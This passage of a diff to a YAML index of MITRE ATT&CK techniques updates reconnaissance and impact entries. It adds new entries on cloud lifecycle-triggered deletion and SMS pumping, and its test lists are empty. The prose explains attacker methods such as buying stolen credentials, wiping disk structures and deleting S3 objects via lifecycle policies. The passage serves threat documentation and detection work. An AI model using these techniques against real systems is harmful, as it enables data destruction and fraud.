-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -112604,7 +113282,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -112620,8 +113298,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -112647,7 +113323,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -112665,8 +113341,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -112688,7 +113362,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -112704,12 +113378,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -112719,17 +113391,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -112741,6 +113416,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -112751,7 +113427,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -112761,6 +113437,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -112773,6 +113453,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -112795,6 +113479,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -112802,9 +113490,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -112863,7 +113550,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -112883,7 +113570,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -112905,7 +113591,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -112921,12 +113607,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -112995,7 +113679,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -113043,31 +113727,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -113076,19 +113741,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -113146,7 +113833,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -113167,7 +113853,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -113183,8 +113869,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -113210,7 +113894,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -113226,8 +113910,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -113251,7 +113933,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -113273,13 +113955,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -113371,13 +114051,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -113386,7 +114065,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -113403,17 +114081,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -113438,7 +114111,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -113476,7 +114150,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -113510,12 +114184,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -113580,42 +114252,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+  T1485.001:
+    technique:
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
